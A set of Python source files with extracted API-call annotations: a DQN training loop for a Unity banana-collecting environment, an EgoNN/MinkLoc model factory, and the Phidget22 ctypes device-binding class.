Linux (x86, headless): "path/to/Banana_Linux_NoVis/Banana.x86" Linux (x86_64, headless): "path/to/Banana_Linux_NoVis/Banana.x86_64" """ # start Unity environment env = UnityEnvironment(file_name="Banana.app") # get the default brain brain_name = env.brain_names[0] brain = env.brains[brain_name] env_info = env.reset(train_mode=False)[brain_name] action_size = brain.vector_action_space_size state_size = len(env_info.vector_observations[0]) # initialize agent agent = Agent(state_size=state_size, action_size=action_size, seed=0, device=device) def train(n_episodes=2000, eps_start=1.0, eps_end=0.05, eps_decay=0.99): """Deep Q-Learning. Params ====== n_episodes (int): maximum number of training episodes eps_start (float): starting value of epsilon, for epsilon-greedy action selection eps_end (float): minimum value of epsilon eps_decay (float): multiplicative factor (per episode) for decreasing epsilon """ scores = [] # list containing scores from each episode scores_window = deque(maxlen=100) # last 100 scores eps = eps_start # initialize epsilon for i_episode in range(1, n_episodes+1): # reset environment env_info = env.reset(train_mode=True)[brain_name] # get initial state state = env_info.vector_observations[0] # set initial score score = 0 while True: action = agent.act(state, eps) env_info = env.step(action)[brain_name] next_state, reward, done = env_info.vector_observations[0], env_info.rewards[0], env_info.local_done[0] agent.step(state, action, reward, next_state, done) state = next_state score += reward if done: break scores_window.append(score) # save most recent score scores.append(score) # save most recent score eps = max(eps_end, eps_decay*eps) # decrease epsilon print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)), end="") if i_episode % 100 == 0: print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window))) if np.mean(scores_window)>=14: print('\nEnvironment solved in {:d} episodes!\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_window))) torch.save(agent.qnetwork_local.state_dict(), 'checkpoint.pth') break return scores train()
[ "numpy.mean", "collections.deque", "dqn_agent.Agent", "unityagents.UnityEnvironment", "torch.cuda.is_available" ]
[((1524, 1564), 'unityagents.UnityEnvironment', 'UnityEnvironment', ([], {'file_name': '"""Banana.app"""'}), "(file_name='Banana.app')\n", (1540, 1564), False, 'from unityagents import UnityEnvironment\n'), ((1829, 1905), 'dqn_agent.Agent', 'Agent', ([], {'state_size': 'state_size', 'action_size': 'action_size', 'seed': '(0)', 'device': 'device'}), '(state_size=state_size, action_size=action_size, seed=0, device=device)\n', (1834, 1905), False, 'from dqn_agent import Agent\n'), ((2429, 2446), 'collections.deque', 'deque', ([], {'maxlen': '(100)'}), '(maxlen=100)\n', (2434, 2446), False, 'from collections import deque\n'), ((1038, 1063), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1061, 1063), False, 'import torch\n'), ((3653, 3675), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\n', (3660, 3675), True, 'import numpy as np\n'), ((3477, 3499), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\n', (3484, 3499), True, 'import numpy as np\n'), ((3617, 3639), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\n', (3624, 3639), True, 'import numpy as np\n'), ((3785, 3807), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\n', (3792, 3807), True, 'import numpy as np\n')]
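As a quick sanity check on the epsilon-greedy schedule used by train() above (eps_start=1.0, eps_decay=0.99, eps_end=0.05), the floor is reached after roughly 300 episodes; this small standalone calculation is ours, not part of the source:

# Number of episodes before eps = eps_start * eps_decay**k first drops below eps_end.
import math

eps_start, eps_end, eps_decay = 1.0, 0.05, 0.99
episodes_to_floor = math.ceil(math.log(eps_end / eps_start) / math.log(eps_decay))
print(episodes_to_floor)   # 299; afterwards eps is clamped at eps_end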
# Warsaw University of Technology

from layers.eca_block import ECABasicBlock
from models.minkgl import MinkHead, MinkTrunk, MinkGL
from models.minkloc import MinkLoc
from third_party.minkloc3d.minkloc import MinkLoc3D
from misc.utils import ModelParams


def model_factory(model_params: ModelParams):
    in_channels = 1

    if model_params.model == 'MinkLoc':
        model = MinkLoc(in_channels=in_channels, feature_size=model_params.feature_size,
                        output_dim=model_params.output_dim, planes=model_params.planes,
                        layers=model_params.layers, num_top_down=model_params.num_top_down,
                        conv0_kernel_size=model_params.conv0_kernel_size,
                        block=model_params.block, pooling_method=model_params.pooling)
    elif model_params.model == 'MinkLoc3D':
        model = MinkLoc3D()
    elif 'egonn' in model_params.model:
        model = create_egonn_model(model_params)
    else:
        raise NotImplementedError('Model not implemented: {}'.format(model_params.model))

    return model


def create_egonn_model(model_params: ModelParams):
    model_name = model_params.model

    global_normalize = False
    local_normalize = True

    if model_name == 'egonn':
        # THIS IS OUR BEST MODEL
        block = ECABasicBlock
        planes = [32, 64, 64, 128, 128, 128, 128]
        layers = [1, 1, 1, 1, 1, 1, 1]

        global_in_levels = [5, 6, 7]
        global_map_channels = 128
        global_descriptor_size = 256

        local_in_levels = [3, 4]
        local_map_channels = 64
        local_descriptor_size = 128
    else:
        raise NotImplementedError(f'Unknown model: {model_name}')

    # Planes list number of channels for level 1 and above
    global_in_channels = [planes[i - 1] for i in global_in_levels]
    head_global = MinkHead(global_in_levels, global_in_channels, global_map_channels)

    if len(local_in_levels) > 0:
        local_in_channels = [planes[i - 1] for i in local_in_levels]
        head_local = MinkHead(local_in_levels, local_in_channels, local_map_channels)
    else:
        head_local = None

    min_out_level = len(planes)
    if len(global_in_levels) > 0:
        min_out_level = min(min_out_level, min(global_in_levels))
    if len(local_in_levels) > 0:
        min_out_level = min(min_out_level, min(local_in_levels))

    trunk = MinkTrunk(in_channels=1, planes=planes, layers=layers, conv0_kernel_size=5,
                      block=block, min_out_level=min_out_level)

    net = MinkGL(trunk, local_head=head_local, local_descriptor_size=local_descriptor_size,
                 local_normalize=local_normalize, global_head=head_global,
                 global_descriptor_size=global_descriptor_size, global_pool_method='GeM',
                 global_normalize=global_normalize, quantizer=model_params.quantizer)

    return net
[ "models.minkgl.MinkHead", "models.minkgl.MinkGL", "models.minkloc.MinkLoc", "models.minkgl.MinkTrunk", "third_party.minkloc3d.minkloc.MinkLoc3D" ]
[((1835, 1902), 'models.minkgl.MinkHead', 'MinkHead', (['global_in_levels', 'global_in_channels', 'global_map_channels'], {}), '(global_in_levels, global_in_channels, global_map_channels)\n', (1843, 1902), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\n'), ((2370, 2491), 'models.minkgl.MinkTrunk', 'MinkTrunk', ([], {'in_channels': '(1)', 'planes': 'planes', 'layers': 'layers', 'conv0_kernel_size': '(5)', 'block': 'block', 'min_out_level': 'min_out_level'}), '(in_channels=1, planes=planes, layers=layers, conv0_kernel_size=5,\n block=block, min_out_level=min_out_level)\n', (2379, 2491), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\n'), ((2521, 2821), 'models.minkgl.MinkGL', 'MinkGL', (['trunk'], {'local_head': 'head_local', 'local_descriptor_size': 'local_descriptor_size', 'local_normalize': 'local_normalize', 'global_head': 'head_global', 'global_descriptor_size': 'global_descriptor_size', 'global_pool_method': '"""GeM"""', 'global_normalize': 'global_normalize', 'quantizer': 'model_params.quantizer'}), "(trunk, local_head=head_local, local_descriptor_size=\n local_descriptor_size, local_normalize=local_normalize, global_head=\n head_global, global_descriptor_size=global_descriptor_size,\n global_pool_method='GeM', global_normalize=global_normalize, quantizer=\n model_params.quantizer)\n", (2527, 2821), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\n'), ((381, 716), 'models.minkloc.MinkLoc', 'MinkLoc', ([], {'in_channels': 'in_channels', 'feature_size': 'model_params.feature_size', 'output_dim': 'model_params.output_dim', 'planes': 'model_params.planes', 'layers': 'model_params.layers', 'num_top_down': 'model_params.num_top_down', 'conv0_kernel_size': 'model_params.conv0_kernel_size', 'block': 'model_params.block', 'pooling_method': 'model_params.pooling'}), '(in_channels=in_channels, feature_size=model_params.feature_size,\n output_dim=model_params.output_dim, planes=model_params.planes, layers=\n model_params.layers, num_top_down=model_params.num_top_down,\n conv0_kernel_size=model_params.conv0_kernel_size, block=model_params.\n block, pooling_method=model_params.pooling)\n', (388, 716), False, 'from models.minkloc import MinkLoc\n'), ((2025, 2089), 'models.minkgl.MinkHead', 'MinkHead', (['local_in_levels', 'local_in_channels', 'local_map_channels'], {}), '(local_in_levels, local_in_channels, local_map_channels)\n', (2033, 2089), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\n'), ((856, 867), 'third_party.minkloc3d.minkloc.MinkLoc3D', 'MinkLoc3D', ([], {}), '()\n', (865, 867), False, 'from third_party.minkloc3d.minkloc import MinkLoc3D\n')]
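A worked example of the channel bookkeeping in create_egonn_model above, using the 'egonn' configuration it hard-codes (the values are reproduced from the source; the evaluated results in the comments are ours):

# How the head channel lists and the trunk's minimum output level are derived.
planes = [32, 64, 64, 128, 128, 128, 128]
global_in_levels = [5, 6, 7]
local_in_levels = [3, 4]

global_in_channels = [planes[i - 1] for i in global_in_levels]   # [128, 128, 128]
local_in_channels = [planes[i - 1] for i in local_in_levels]     # [64, 128]
min_out_level = min(len(planes), min(global_in_levels), min(local_in_levels))   # 3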
import sys import ctypes from Phidget22.PhidgetSupport import PhidgetSupport from Phidget22.Async import * from Phidget22.ChannelClass import ChannelClass from Phidget22.ChannelSubclass import ChannelSubclass from Phidget22.DeviceClass import DeviceClass from Phidget22.DeviceID import DeviceID from Phidget22.ErrorEventCode import ErrorEventCode from Phidget22.PhidgetException import PhidgetException class Phidget: def __init__(self): self.handle = ctypes.c_void_p() if sys.platform == 'win32': self._AttachFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p) else: self._AttachFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p) self._Attach = None self._onAttach = None if sys.platform == 'win32': self._DetachFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p) else: self._DetachFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p) self._Detach = None self._onDetach = None if sys.platform == 'win32': self._ErrorFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int, ctypes.c_char_p) else: self._ErrorFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int, ctypes.c_char_p) self._Error = None self._onError = None if sys.platform == 'win32': self._PropertyChangeFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p) else: self._PropertyChangeFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p) self._PropertyChange = None self._onPropertyChange = None def __eq__(self, other): return hasattr(other, 'handle') and self.handle.value == other.handle.value def __hash__(self): return self.handle.value def __str__(self): _value = (ctypes.c_char * 65536)() _valueLen = ctypes.c_int32(65536) if self.getIsChannel(): __func = PhidgetSupport.getDll().channelInfo else: __func = PhidgetSupport.getDll().deviceInfo result = __func(self.handle, ctypes.byref(_value), _valueLen) return _value.value.decode('utf- 8') def __del__(self): __func = PhidgetSupport.getDll().Phidget_delete __func.restype = ctypes.c_int32 res = __func(ctypes.byref(self.handle)) self.handle = None if res > 0: raise PhidgetException(res) def _localAttachEvent(self, handle, userPtr): if self._Attach == None: return self._Attach(self) def setOnAttachHandler(self, handler): if handler == None: self._Attach = None self._onAttach = None else: self._Attach = handler self._onAttach = self._AttachFactory(self._localAttachEvent) try: __func = PhidgetSupport.getDll().Phidget_setOnAttachHandler __func.restype = ctypes.c_int32 res = __func(self.handle, self._onAttach, None) except RuntimeError: self._Attach = None self._onAttach = None def _localDetachEvent(self, handle, userPtr): if self._Detach == None: return self._Detach(self) def setOnDetachHandler(self, handler): if handler == None: self._Detach = None self._onDetach = None else: self._Detach = handler self._onDetach = self._DetachFactory(self._localDetachEvent) try: __func = PhidgetSupport.getDll().Phidget_setOnDetachHandler __func.restype = ctypes.c_int32 res = __func(self.handle, self._onDetach, None) except RuntimeError: self._Detach = None self._onDetach = None def _localErrorEvent(self, handle, userPtr, Code, Description): if self._Error == None: return Description = Description.decode('utf-8') self._Error(self, Code, Description) def setOnErrorHandler(self, handler): if handler == None: self._Error = None self._onError = None else: self._Error = handler self._onError = self._ErrorFactory(self._localErrorEvent) try: __func = 
PhidgetSupport.getDll().Phidget_setOnErrorHandler __func.restype = ctypes.c_int32 res = __func(self.handle, self._onError, None) except RuntimeError: self._Error = None self._onError = None def _localPropertyChangeEvent(self, handle, userPtr, propertyName): if self._PropertyChange == None: return propertyName = propertyName.decode('utf-8') self._PropertyChange(self, propertyName) def setOnPropertyChangeHandler(self, handler): if handler == None: self._PropertyChange = None self._onPropertyChange = None else: self._PropertyChange = handler self._onPropertyChange = self._PropertyChangeFactory(self._localPropertyChangeEvent) try: __func = PhidgetSupport.getDll().Phidget_setOnPropertyChangeHandler __func.restype = ctypes.c_int32 res = __func(self.handle, self._onPropertyChange, None) except RuntimeError: self._PropertyChange = None self._onPropertyChange = None @staticmethod def finalize(flags): _flags = ctypes.c_int32(flags) __func = PhidgetSupport.getDll().Phidget_finalize __func.restype = ctypes.c_int32 result = __func(_flags) if result > 0: raise PhidgetException(result) @staticmethod def getLibraryVersion(): _LibraryVersion = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getLibraryVersion __func.restype = ctypes.c_int32 result = __func(ctypes.byref(_LibraryVersion)) if result > 0: raise PhidgetException(result) return _LibraryVersion.value.decode('utf-8') @staticmethod def getLibraryVersionNumber(): _LibraryVersionNumber = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getLibraryVersionNumber __func.restype = ctypes.c_int32 result = __func(ctypes.byref(_LibraryVersionNumber)) if result > 0: raise PhidgetException(result) return _LibraryVersionNumber.value.decode('utf-8') @staticmethod def resetLibrary(): __func = PhidgetSupport.getDll().Phidget_resetLibrary __func.restype = ctypes.c_int32 result = __func() if result > 0: raise PhidgetException(result) def getAttached(self): _Attached = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getAttached __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_Attached)) if result > 0: raise PhidgetException(result) return _Attached.value def getChannel(self): _Channel = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getChannel __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_Channel)) if result > 0: raise PhidgetException(result) return _Channel.value def setChannel(self, Channel): _Channel = ctypes.c_int(Channel) __func = PhidgetSupport.getDll().Phidget_setChannel __func.restype = ctypes.c_int32 result = __func(self.handle, _Channel) if result > 0: raise PhidgetException(result) def getChannelClass(self): _ChannelClass = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getChannelClass __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ChannelClass)) if result > 0: raise PhidgetException(result) return _ChannelClass.value def getChannelClassName(self): _ChannelClassName = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getChannelClassName __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ChannelClassName)) if result > 0: raise PhidgetException(result) return _ChannelClassName.value.decode('utf-8') def getChannelName(self): _ChannelName = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getChannelName __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ChannelName)) if result > 0: raise PhidgetException(result) return _ChannelName.value.decode('utf-8') def 
getChannelSubclass(self): _ChannelSubclass = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getChannelSubclass __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ChannelSubclass)) if result > 0: raise PhidgetException(result) return _ChannelSubclass.value def close(self): __func = PhidgetSupport.getDll().Phidget_close __func.restype = ctypes.c_int32 result = __func(self.handle) if result > 0: raise PhidgetException(result) def getDeviceChannelCount(self, cls): _cls = ctypes.c_int(cls) _count = ctypes.c_uint32() __func = PhidgetSupport.getDll().Phidget_getDeviceChannelCount __func.restype = ctypes.c_int32 result = __func(self.handle, _cls, ctypes.byref(_count)) if result > 0: raise PhidgetException(result) return _count.value def getDeviceClass(self): _DeviceClass = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getDeviceClass __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceClass)) if result > 0: raise PhidgetException(result) return _DeviceClass.value def getDeviceClassName(self): _DeviceClassName = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getDeviceClassName __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceClassName)) if result > 0: raise PhidgetException(result) return _DeviceClassName.value.decode('utf-8') def getDeviceID(self): _DeviceID = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getDeviceID __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceID)) if result > 0: raise PhidgetException(result) return _DeviceID.value def getDeviceLabel(self): _DeviceLabel = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getDeviceLabel __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceLabel)) if result > 0: raise PhidgetException(result) return _DeviceLabel.value.decode('utf-8') def setDeviceLabel(self, DeviceLabel): _DeviceLabel = ctypes.create_string_buffer(DeviceLabel.encode('utf-8')) __func = PhidgetSupport.getDll().Phidget_setDeviceLabel __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceLabel)) if result > 0: raise PhidgetException(result) def getDeviceName(self): _DeviceName = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getDeviceName __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceName)) if result > 0: raise PhidgetException(result) return _DeviceName.value.decode('utf-8') def getDeviceSerialNumber(self): _DeviceSerialNumber = ctypes.c_int32() __func = PhidgetSupport.getDll().Phidget_getDeviceSerialNumber __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceSerialNumber)) if result > 0: raise PhidgetException(result) return _DeviceSerialNumber.value def setDeviceSerialNumber(self, DeviceSerialNumber): _DeviceSerialNumber = ctypes.c_int32(DeviceSerialNumber) __func = PhidgetSupport.getDll().Phidget_setDeviceSerialNumber __func.restype = ctypes.c_int32 result = __func(self.handle, _DeviceSerialNumber) if result > 0: raise PhidgetException(result) def getDeviceSKU(self): _DeviceSKU = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getDeviceSKU __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_DeviceSKU)) if result > 0: raise PhidgetException(result) return _DeviceSKU.value.decode('utf-8') def getDeviceVersion(self): _DeviceVersion = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getDeviceVersion __func.restype = ctypes.c_int32 result = 
__func(self.handle, ctypes.byref(_DeviceVersion)) if result > 0: raise PhidgetException(result) return _DeviceVersion.value def getHub(self): _Hub = ctypes.c_void_p() __func = PhidgetSupport.getDll().Phidget_getHub __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_Hub)) if result > 0: raise PhidgetException(result) __Hub = Phidget() __Hub.handle = _Hub return __Hub def getHubPort(self): _HubPort = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getHubPort __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_HubPort)) if result > 0: raise PhidgetException(result) return _HubPort.value def setHubPort(self, HubPort): _HubPort = ctypes.c_int(HubPort) __func = PhidgetSupport.getDll().Phidget_setHubPort __func.restype = ctypes.c_int32 result = __func(self.handle, _HubPort) if result > 0: raise PhidgetException(result) def getHubPortCount(self): _HubPortCount = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getHubPortCount __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_HubPortCount)) if result > 0: raise PhidgetException(result) return _HubPortCount.value def getHubPortSpeed(self): _HubPortSpeed = ctypes.c_uint32() __func = PhidgetSupport.getDll().Phidget_getHubPortSpeed __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_HubPortSpeed)) if result > 0: raise PhidgetException(result) return _HubPortSpeed.value def setHubPortSpeed(self, HubPortSpeed): _HubPortSpeed = ctypes.c_uint32(HubPortSpeed) __func = PhidgetSupport.getDll().Phidget_setHubPortSpeed __func.restype = ctypes.c_int32 result = __func(self.handle, _HubPortSpeed) if result > 0: raise PhidgetException(result) def getMaxHubPortSpeed(self): _MaxHubPortSpeed = ctypes.c_uint32() __func = PhidgetSupport.getDll().Phidget_getMaxHubPortSpeed __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_MaxHubPortSpeed)) if result > 0: raise PhidgetException(result) return _MaxHubPortSpeed.value def getHubPortSupportsSetSpeed(self): _HubPortSupportsSetSpeed = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getHubPortSupportsSetSpeed __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_HubPortSupportsSetSpeed)) if result > 0: raise PhidgetException(result) return _HubPortSupportsSetSpeed.value def getIsChannel(self): _IsChannel = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getIsChannel __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_IsChannel)) if result > 0: raise PhidgetException(result) return _IsChannel.value def getIsHubPortDevice(self): _IsHubPortDevice = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getIsHubPortDevice __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_IsHubPortDevice)) if result > 0: raise PhidgetException(result) return _IsHubPortDevice.value def setIsHubPortDevice(self, IsHubPortDevice): _IsHubPortDevice = ctypes.c_int(IsHubPortDevice) __func = PhidgetSupport.getDll().Phidget_setIsHubPortDevice __func.restype = ctypes.c_int32 result = __func(self.handle, _IsHubPortDevice) if result > 0: raise PhidgetException(result) def getIsLocal(self): _IsLocal = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getIsLocal __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_IsLocal)) if result > 0: raise PhidgetException(result) return _IsLocal.value def setIsLocal(self, IsLocal): _IsLocal = ctypes.c_int(IsLocal) __func = PhidgetSupport.getDll().Phidget_setIsLocal __func.restype 
= ctypes.c_int32 result = __func(self.handle, _IsLocal) if result > 0: raise PhidgetException(result) def getIsRemote(self): _IsRemote = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getIsRemote __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_IsRemote)) if result > 0: raise PhidgetException(result) return _IsRemote.value def setIsRemote(self, IsRemote): _IsRemote = ctypes.c_int(IsRemote) __func = PhidgetSupport.getDll().Phidget_setIsRemote __func.restype = ctypes.c_int32 result = __func(self.handle, _IsRemote) if result > 0: raise PhidgetException(result) def open(self): __func = PhidgetSupport.getDll().Phidget_open __func.restype = ctypes.c_int32 result = __func(self.handle) if result > 0: raise PhidgetException(result) def openWaitForAttachment(self, timeout): _timeout = ctypes.c_uint32(timeout) __func = PhidgetSupport.getDll().Phidget_openWaitForAttachment __func.restype = ctypes.c_int32 result = __func(self.handle, _timeout) if result > 0: raise PhidgetException(result) def getParent(self): _Parent = ctypes.c_void_p() __func = PhidgetSupport.getDll().Phidget_getParent __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_Parent)) if result > 0: raise PhidgetException(result) __Parent = Phidget() __Parent.handle = _Parent return __Parent def getServerHostname(self): _ServerHostname = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getServerHostname __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ServerHostname)) if result > 0: raise PhidgetException(result) return _ServerHostname.value.decode('utf-8') def getServerName(self): _ServerName = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getServerName __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ServerName)) if result > 0: raise PhidgetException(result) return _ServerName.value.decode('utf-8') def setServerName(self, ServerName): _ServerName = ctypes.create_string_buffer(ServerName.encode('utf-8')) __func = PhidgetSupport.getDll().Phidget_setServerName __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ServerName)) if result > 0: raise PhidgetException(result) def getServerPeerName(self): _ServerPeerName = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getServerPeerName __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ServerPeerName)) if result > 0: raise PhidgetException(result) return _ServerPeerName.value.decode('utf-8') def getServerUniqueName(self): _ServerUniqueName = ctypes.c_char_p() __func = PhidgetSupport.getDll().Phidget_getServerUniqueName __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_ServerUniqueName)) if result > 0: raise PhidgetException(result) return _ServerUniqueName.value.decode('utf-8') def getMaxVINTDeviceSpeed(self): _MaxVINTDeviceSpeed = ctypes.c_uint32() __func = PhidgetSupport.getDll().Phidget_getMaxVINTDeviceSpeed __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_MaxVINTDeviceSpeed)) if result > 0: raise PhidgetException(result) return _MaxVINTDeviceSpeed.value def getVINTDeviceSupportsSetSpeed(self): _VINTDeviceSupportsSetSpeed = ctypes.c_int() __func = PhidgetSupport.getDll().Phidget_getVINTDeviceSupportsSetSpeed __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_VINTDeviceSupportsSetSpeed)) if result > 0: raise PhidgetException(result) return _VINTDeviceSupportsSetSpeed.value def writeDeviceLabel(self, deviceLabel): _deviceLabel = 
ctypes.create_string_buffer(deviceLabel.encode('utf-8')) __func = PhidgetSupport.getDll().Phidget_writeDeviceLabel __func.restype = ctypes.c_int32 result = __func(self.handle, ctypes.byref(_deviceLabel)) if result > 0: raise PhidgetException(result) ANY_SERIAL_NUMBER = -1 ANY_HUB_PORT = -1 ANY_CHANNEL = -1 ANY_LABEL = None INFINITE_TIMEOUT = 0 DEFAULT_TIMEOUT = 1000
[ "ctypes.CFUNCTYPE", "ctypes.c_uint32", "ctypes.byref", "ctypes.c_int32", "Phidget22.PhidgetSupport.PhidgetSupport.getDll", "Phidget22.PhidgetException.PhidgetException", "ctypes.WINFUNCTYPE", "ctypes.c_int", "ctypes.c_void_p", "ctypes.c_char_p" ]
[((457, 474), 'ctypes.c_void_p', 'ctypes.c_void_p', ([], {}), '()\n', (472, 474), False, 'import ctypes\n'), ((1830, 1851), 'ctypes.c_int32', 'ctypes.c_int32', (['(65536)'], {}), '(65536)\n', (1844, 1851), False, 'import ctypes\n'), ((4772, 4793), 'ctypes.c_int32', 'ctypes.c_int32', (['flags'], {}), '(flags)\n', (4786, 4793), False, 'import ctypes\n'), ((5022, 5039), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (5037, 5039), False, 'import ctypes\n'), ((5359, 5376), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (5374, 5376), False, 'import ctypes\n'), ((5879, 5893), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (5891, 5893), False, 'import ctypes\n'), ((6155, 6169), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (6167, 6169), False, 'import ctypes\n'), ((6437, 6458), 'ctypes.c_int', 'ctypes.c_int', (['Channel'], {}), '(Channel)\n', (6449, 6458), False, 'import ctypes\n'), ((6689, 6703), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (6701, 6703), False, 'import ctypes\n'), ((6995, 7012), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (7010, 7012), False, 'import ctypes\n'), ((7322, 7339), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (7337, 7339), False, 'import ctypes\n'), ((7642, 7656), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (7654, 7656), False, 'import ctypes\n'), ((8137, 8154), 'ctypes.c_int', 'ctypes.c_int', (['cls'], {}), '(cls)\n', (8149, 8154), False, 'import ctypes\n'), ((8166, 8183), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\n', (8181, 8183), False, 'import ctypes\n'), ((8463, 8477), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (8475, 8477), False, 'import ctypes\n'), ((8764, 8781), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (8779, 8781), False, 'import ctypes\n'), ((9082, 9096), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (9094, 9096), False, 'import ctypes\n'), ((9366, 9383), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (9381, 9383), False, 'import ctypes\n'), ((9996, 10013), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (10011, 10013), False, 'import ctypes\n'), ((10319, 10335), 'ctypes.c_int32', 'ctypes.c_int32', ([], {}), '()\n', (10333, 10335), False, 'import ctypes\n'), ((10669, 10703), 'ctypes.c_int32', 'ctypes.c_int32', (['DeviceSerialNumber'], {}), '(DeviceSerialNumber)\n', (10683, 10703), False, 'import ctypes\n'), ((10950, 10967), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (10965, 10967), False, 'import ctypes\n'), ((11260, 11274), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (11272, 11274), False, 'import ctypes\n'), ((11543, 11560), 'ctypes.c_void_p', 'ctypes.c_void_p', ([], {}), '()\n', (11558, 11560), False, 'import ctypes\n'), ((11844, 11858), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (11856, 11858), False, 'import ctypes\n'), ((12126, 12147), 'ctypes.c_int', 'ctypes.c_int', (['HubPort'], {}), '(HubPort)\n', (12138, 12147), False, 'import ctypes\n'), ((12378, 12392), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (12390, 12392), False, 'import ctypes\n'), ((12676, 12693), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\n', (12691, 12693), False, 'import ctypes\n'), ((12991, 13020), 'ctypes.c_uint32', 